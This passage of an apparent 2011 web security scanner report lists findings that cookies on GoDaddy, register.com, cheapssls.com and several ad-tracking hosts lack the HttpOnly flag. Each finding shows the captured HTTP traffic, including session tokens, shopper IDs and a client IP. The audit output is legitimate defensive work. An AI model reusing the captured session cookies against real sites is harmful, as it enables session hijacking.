Set-Cookie: pagecount=3; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=3; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:36&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:36 GMT; path=/
Set-Cookie: traffic=; domain=.godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:36 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

11.2. http://img.godaddy.com/pageevents.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://img.godaddy.com
Path:   /pageevents.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pageevents.aspx?page_name=/ssl/ssl-certificates.aspx&ci=15014&eventtype=&ciimpressions=&usrin=&r=0.6363521805033088&comview=0 HTTP/1.1
Host: img.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; pagecount=2; fb_pagecount=2; actioncount=; fb_actioncount=; app_pathway=; fb_session=S_TOUCH=09/03/2011 21:32:13&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:59; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB109&status=200 OK&querystring=&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=8d587be0-834e-4a03-83dc-2f3bcb783a40&referringdomain=&split=24; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: pagecount=15; domain=.godaddy.com; path=/
Set-Cookie: fb_pagecount=15; path=/
Set-Cookie: actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
Set-Cookie: fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
Set-Cookie: app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
Set-Cookie: fb_session=S_TOUCH=09/03/2011 21:49:49&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
Set-Cookie: isc="; domain=.godaddy.com; path=/
Set-Cookie: visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:50 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA
Date: Sat, 03 Sep 2011 21:49:50 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

11.3. http://login.dotomi.com/ucm/UCMController  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/ HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:32:42 GMT
X-Name: dmc-s09
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=230900890276886667$0$2054424934; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiSession_2304=2_270600892638176047$230900890276886667$2054424934$1315085562782; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUFRLZ3hua1xARWZBXAICW0dLSEFdZWBcemhkUH5RIgFAaV0%3D; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
Set-Cookie: DotomiRR2304=-1$4$1$-1$1$1$; Domain=.dotomi.com; Expires=Sun, 04-Sep-2011 21:32:42 GMT; Path=/
Content-Type: text/html
Content-Length: 1573

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

11.4. http://www.cheapssls.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cheapssls.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST / HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 3791
Cache-Control: max-age=0
Origin: http://www.cheapssls.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKYQY9kNoc4OMitTj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="result_ids"

cart_status,wish_list
------WebKitFormBoundaryKYQY9kNoc4OMitTj
Content-Disposition: form-data; name="re
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:49 GMT
Location: http://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=oimsl5irn8eq044otel7tsq8g5; expires=Sat, 17-Sep-2011 21:43:49 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 180

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

11.5. http://www.cheapssls.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?dispatch=checkout.cart HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __ar_v4=TL4HVZJAKBDONOOUY7KOKV%3A20110903%3A5%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A5%7C3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A5; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.16.9.1315085525172; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:50 GMT
Location: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=tt1a563t87rk9ibbpnpq0ptvm4; expires=Sat, 17-Sep-2011 21:43:50 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 181

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

11.6. http://www.register.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.register.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:31:33 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 30110
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

11.7. http://www.register.com/domain/searchresults.rcmx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.register.com
Path:   /domain/searchresults.rcmx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:39:08 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=FC623F2DB25506910A73E866C7ED4DCB.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=9f156b13a4f431e8f00ccda3b691d1c601a75911468e3f0e4e629e11286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 31307
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

11.8. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1429123&id=725544&id=74894&id=547417&id=119282&t=2 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: bh="b!!!#I!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!-?2!!!!-=38n'!!-O3!!!!*=38n'!!1SP!!!!#=38n,!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!itb!!!!%=1j[w!!vRq!!!!$=1j[w!!vRr!!!!$=1j[w!!vRw!!!!$=1j[w!!vRx!!!!$=1j[w!!vRy!!!!$=1j[w!#!,g!!!!$=1j[w!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0L2!!!!%=1Cp-!#0fU!!!!#=1j[w!#0fW!!!!#=1j[w!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#44f!!!!$=1j[w!#44h!!!!$=1j[w!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!$=1j[w!#MTH!!!!$=1j[w!#MTI!!!!$=1j[w!#MTJ!!!!$=1j[w!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#U5q!!!!#=09!!!#UDP!!!!$=1j[w!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!$=1j[w!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!'=/<(I!#g<y!!!!%=38n'!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tn2!!!!$=1j[w!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!$=1j[w!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!$=1j[w!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!#=1D5@!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$,0h!!!!$=2Z2#!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!%=1D5C!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?tC!!!!#=38n'"; ih="b!!!!(!->h]!!!!#=/XuQ!0eUs!!!!#=1F/L!34fN!!!!#=/b4V!34fX!!!!#=/b4X!3DVF!!!!#=1F/N"; BX=8d7n6ot73ufk2&b=4&s=8m&t=219; pv1="b!!!!#!$'!L!$5*F!$kY3!3DVF!%JP7!!!!$!?5%!'2po7!?Q8(!'RQt~~~~~~~=1F/N=3CT*!!!(["; uid=uid=1071eb2c-d4cd-11e0-892f-78e7d1f5079e&_hmacv=1&_salt=321185080&_keyid=k1&_hmac=d75501ec81bb906d515b301e794922b4d10045fa

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 14:43:58 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#N!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!-?2!!!!-=38n'!!-C,!!!!$=3BC@!!-O3!!!!*=38n'!!1SP!!!!#=38n,!!3O?!!!!$=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!itb!!!!%=1j[w!!pf4!!!!$=3BC@!!vRq!!!!$=1j[w!!vRr!!!!$=1j[w!!vRw!!!!$=1j[w!!vRx!!!!$=1j[w!!vRy!!!!$=1j[w!#!,g!!!!$=1j[w!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0L2!!!!%=1Cp-!#0fU!!!!#=1j[w!#0fW!!!!#=1j[w!#2Gj!!!!$=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#44f!!!!$=1j[w!#44h!!!!$=1j[w!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!$=1j[w!#MTH!!!!$=1j[w!#MTI!!!!$=1j[w!#MTJ!!!!$=1j[w!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#U5q!!!!#=09!!!#UDP!!!!$=1j[w!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!$=1j[w!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!'=/<(I!#g<y!!!!%=38n'!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tn2!!!!$=1j[w!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!$=1j[w!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!$=1j[w!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!#=1D5@!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$,0h!!!!$=2Z2#!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!%=1D5C!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?i5!!!!$=3BC@!$?tC!!!!#=38n'"; path=/; expires=Mon, 02-Sep-2013 14:43:58 GMT
Set-Cookie: BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 03 Sep 2011 14:43:58 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

11.9. http://am.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://am.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2304&dtm_cmagic=e6c2dc&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_user_type=NEW&dtmc_product_type=Home&dtmc_product_id=TTN%3A%20Home&dtmc_domain_name=&dtm_items=&dtmc_domain_status=&dtmc_domain_variations=&dtmc_source=WWW000000000W&dtmc_ref=&dtmc_loc=http%3A//www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=4fae74084-d4c4-4986-af20-d7ce71839597-gs1x0mwv; T_k5bs=ndp%3Ay5%3A1; rth=2-lqupie-ndp~y5~1~1-exv~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Sat, 03 Sep 2011 21:33:57 GMT
Connection: close
Set-Cookie: T_k5bs=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_8t18=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3dqj=44%3A4528%3A1; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Set-Cookie: rth=2-lqupie-44~4528~1~1-ndp~y5~1~1-exv~0~1~1-; Domain=trafficmp.com; Expires=Sun, 02-Sep-2012 21:33:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.10. http://am.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://am.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=41&id=23 HTTP/1.1
Host: am.trafficmp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
